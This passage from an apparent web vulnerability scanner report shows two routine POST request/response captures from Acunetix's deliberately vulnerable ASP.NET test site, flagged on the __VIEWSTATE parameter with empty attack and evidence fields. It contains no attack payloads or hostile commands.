style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8357&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAADdb3yNoIZGRkVDVCN9%2BbYSEvLXTuJsLbPwDX%2Bn8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKD6tKjCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA9YE2io8AM1aADzhVsHdMHbph0oR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:04 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAADdb3yNoIZGRkVDVCN9+bYSEvLXTuJsLbPwDX+n8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKD6tKjCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA9YE2io8AM1aADzhVsHdMHbph0oR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:White" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8345&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAGNmJv9oIZGRk2lvd%2BvbpUtkuNtV%2B57mXtipKPO4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLO9eLVDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAxhfAIQr3NyIgvcmSD9mIi4irW3l
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:23 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAGNmJv9oIZGRk2lvd+vbpUtkuNtV+57mXtipKPO4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLO9eLVDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAxhfAIQr3NyIgvcmSD9mIi4irW3l" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:White" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 